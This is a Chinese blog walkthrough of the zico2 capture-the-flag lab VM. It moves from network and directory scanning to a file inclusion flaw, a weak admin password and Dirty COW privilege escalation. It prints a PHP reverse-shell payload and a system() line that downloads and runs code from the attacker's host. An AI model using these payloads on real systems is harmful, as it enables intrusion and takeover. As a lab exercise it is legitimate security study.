zico2---文件包含漏洞

信息收集

目标靶机:zico2
主机发现
端口扫描
指纹探测
目录扫描

漏洞发现

漏洞利用

提权
总结

信息收集:一:主机发现
netdiscover -i eth0 -r 192.168.10.0/24
对同网段下的主机进行发现(也可使用namp -sV)
扫出目标IP为192.168.10.136
在这里插入图片描述(1为物理机的虚拟网卡,2为网关,254为边界)
二:端口扫描
masscan --rate =100000 --ports 0-65535 192.168.10.136
在这里插入图片描述
可使用 namp -sv -T4 -O -p 22,80 192.168.10.136 对端口进行扫描
三:指纹获取
whatweb http://192.168.10.136 可以查看主机的部分信息
四:目录扫描
dirb http://192.168.10.136 可以扫描主机目录文件
在这里插入图片描述
漏洞发现:
浏览器访问主机IP:在这里插入图片描述
使用burp suite抓包发现:存在文件包含漏洞在这里插入图片描述**漏洞利用:**访问网页下的bdadmin目录:

在这里插入图片描述
使用弱口令攻击发现,登录口令为:admin
在kali的HTML目录下创建shell脚本:
shell.txt:

<?php  $sock=fsockopen("192.168.10.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>

在这里插入图片描述
在此创建数据库,并将shell.php:<?php system("wget 192.168.10.128/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>写入(此处代码可将攻击者写好的shell.txt 下载并写入到靶机的shell.php 目录下)

访问创建好的数据库:在这里插入图片描述在KALI开启apache服务,并监听4444端口,发现可以进行登录访问

提权:可以使用python -c 'import pty;pty.spawn("/bin/bash")'创建终端
下一步可以使用脏牛提权:可以访问TMP目录,进行写操作,将dirty.c文件写入到tmp目录下
使用gcc -pthread dirty.c -o hacker -lcrypt编译dirty.c文件为hacker程序,在这里插入图片描述
并./hacher 运行此程序
su firefort 进行用户切换,至此,提权完成在这里插入图片描述
访问root目录下的flag文件,拿到flag在这里插入图片描述总结:文件包含漏洞在使用时,需与攻击者建立连接,并将攻击者的代码下载下来,在靶机上运行,可以利用此过程进行shell获取

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值